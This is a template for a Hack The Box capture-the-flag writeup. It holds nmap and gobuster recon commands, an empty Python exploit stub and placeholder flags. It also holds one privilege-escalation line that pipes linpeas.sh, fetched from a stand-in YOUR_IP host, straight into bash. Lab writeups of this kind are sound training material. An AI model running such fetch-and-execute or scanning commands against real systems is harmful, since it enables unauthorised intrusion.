HTB - Example Box Writeup
ctf
writeup
This is a writeup template for CTF challenges. Replace this content with your actual writeup.
Reconnaissance
Nmap Scan
First, let’s start with a port scan:
1
nmap -sC -sV -oN nmap/initial 10.10.10.x
Results:
1
2
3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Apache httpd 2.4.41
Web Enumeration
Found the following directories:
1
gobuster dir -u http://10.10.10.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Initial Foothold
Vulnerability Discovery
Describe the vulnerability found and how it was discovered.
Exploitation
1
2
3
4
5
6
7
8
9
10
#!/usr/bin/env python3
# Exploit code here
import requests
target = "http://10.10.10.x"
payload = "..."
# Exploit logic
response = requests.get(f"{target}/vulnerable?param={payload}")
print(response.text)
Privilege Escalation
Enumeration
After getting a shell, run LinPEAS:
1
curl http://YOUR_IP/linpeas.sh | bash
Root
Found misconfigured SUID binary…
1
2
3
4
# Exploitation steps
./exploit
whoami
# root
Flags
| Flag | Value |
|---|---|
| User | HTB{fake_user_flag} |
| Root | HTB{fake_root_flag} |
Lessons Learned
- Always check for common misconfigurations
- Enumerate thoroughly before exploiting
- Document everything!